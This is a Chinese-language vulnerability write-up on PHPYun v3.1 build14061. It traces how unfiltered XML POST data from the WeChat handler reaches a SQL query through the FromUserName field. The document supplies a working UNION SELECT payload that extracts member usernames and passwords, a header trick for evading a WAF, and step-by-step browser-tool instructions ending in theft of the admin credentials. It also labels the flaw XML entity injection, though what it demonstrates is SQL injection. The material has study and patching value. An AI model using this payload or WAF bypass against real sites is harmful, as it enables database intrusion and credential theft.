跳转至

Phpyun v3.1 xml 注入漏洞

一、漏洞简介

函数过滤不严谨,用户POST过去的内容没有进行任何过滤,导致攻击者可以利用XML实体进行注入,从而获取数据库敏感信息

二、漏洞影响

3.1 build14061

三、复现过程

漏洞分析

本次漏洞文件位于 weixin/model/index.class.php ,代码如下:

private function responseMsg() { $postStr = $GLOBALS[\"HTTP_RAW_POST_DATA\"];

if (!empty($postStr)){

             $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
              $fromUsername = $postObj->FromUserName;
              $toUsername = $postObj->ToUserName;
              $keyword = trim($postObj->Content);
              $time = time();
              $textTpl = "<xml>
     <![CDATA[%s]]>
     <![CDATA[%s]]>
     %s
     <![CDATA[%s]]>
     <![CDATA[%s]]>
     0
     </xml>";
  if(!empty( $keyword ))
              {
              $msgType = "text";
               $contentStr = "Welcome to wechat world!";
               $resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr);
               echo $resultStr;
              }else{
               echo "Input something...";
              }

      }else {
       echo "";
       exit;
      }
  }

这里将$postStr = $GLOBALS[\"HTTP_RAW_POST_DATA\"],通过 simplexml_load_string解析后的内容,将其直接带入了$textTpl。

然而$postStr = $GLOBALS[\"HTTP_RAW_POST_DATA\"] ,直接获取了POST过来的XML内容,没有经过任何处理,并在最后将其输出。 if($MsgType==\'event\') { $MsgEvent = $postObj->Event; if ($MsgEvent==\'subscribe\') { $centerStr = \"\<!--[CDATA[欢迎您关注\".iconv(\'gbk\',\'utf-8\',$this--->config[\'sy_webname\']).\"!/n 1:您可以直接回复关键字如【销售】、【南京 销售】、【南京 销售 XX公司】查找您想要的职位/n绑定您的账户体验更多精彩功能/n感谢您的关注!]]>\"; $this->MsgType = \'text\';

  }elseif ($MsgEvent=='CLICK')
  {
   $EventKey = $postObj->EventKey;
   if($EventKey=='我的帐号'){
    $centerStr = $this->bindUser($fromUsername);

   }elseif($EventKey=='我的消息')
   {
    $centerStr = $this->myMsg($fromUsername);
   }elseif($EventKey=='面试邀请')
   {
    $centerStr = $this->Audition($fromUsername);

   }elseif($EventKey=='简历查看')
   {

    $centerStr = $this->lookResume($fromUsername);

   }elseif($EventKey=='刷新简历')
   {

    $centerStr = $this->refResume($fromUsername);

从上述代码可以看出来,当满足那上面的条件后都会进入不同的相应的函数,但是都会进入一个名为isBind函数。

接下来追踪isBind函数:

private function isBind($wxid=\'\') {

if($wxid)
{
 $User = $this->obj->DB_select_once("member","`wxid`='".$wxid."'","`uid`,`username`");
}
if($User['uid']>0)
{
 $User['bindtype'] = '1';
 $User['cenetrTpl'] = "<![CDATA[您的".iconv('gbk','utf-8',$this->config['sy_webname'])."帐号:".$User['username']."已成功绑定! /n/n/n 您也可以config['sy_weburl']."/wap/index.php?m=login&wxid=".$wxid."/">点击这里进行解绑或绑定其他帐号]]>";

}else{

 $Token = $this->getToken();
 $Url = 'https://api.weixin.qq.com/cgi-bin/user/info?access_token='.$Token.'&openid='.$wxid.'&lang=zh_CN';
 $CurlReturn  = $this->CurlPost($Url);
 $UserInfo    = json_decode($CurlReturn);

 $wxid        = $wxid;
 $wxname      = $UserInfo->nickname;
 $this->config['token_time'] = time();

 $User['cenetrTpl'] = '<![CDATA[您还没有绑定帐号,config['sy_weburl'].'/wap/index.php?m=login&wxid='.$wxid.'">点击这里进行绑定!]]>';
}

return $User;

}

可以看到,从始至终wxid变量始终没有经过任何过滤,在第一行的$wxid就是我们传进来的FromUserName的值,可以直接进入SQL语句,进行任意注入。

因此我们可以针对其构造Payload,内容如下:

一般来说,我们只需要将Payload以POST形式的数据发出去,就可以成功的获取数据库敏感信息,但是服务器如果有WAF,提交的恶意数据必然会被拦截,因此,我们需要修改HTTP头,伪装成XML就可以不受到WAF的拦截:

Content-type:text/xml;charset=utf-8

漏洞复现

我们首先打开目标站点,点击网页左侧注册按钮,首先注册一个账号:

这个时候已经是登录状态,我们按F9 调出 Hack Bar 的界面,点击Enable Post data ,将Payload写入输入框,如下图所示:

payload文件:

注:payload文件内容需手动输入相应位置
<?xml version="1.0" encoding="utf-8"?>
  <xml>
    1111
    1111' and 1=2 union select 1,(select concat(username,password) from phpyun_member limit 0,1)#
    1402550611
    event
    CLICK
    我的账号
    0
  </xml>

接下来还需要修改HTTP头,伪装成XML,点击浏览器上方工具栏,打开Tamper Data ,点击启动。

现在前提工作已经做好,接下来重新访问网站,Tamper Data 就会抓取到数据包,再对数据包进行更改,操作如图:

然后点击确定就可以将构造好的数据包发出去:

成功获取管理员账号密码。

参考链接

https://blog.csdn.net/whatiwhere/article/details/84862236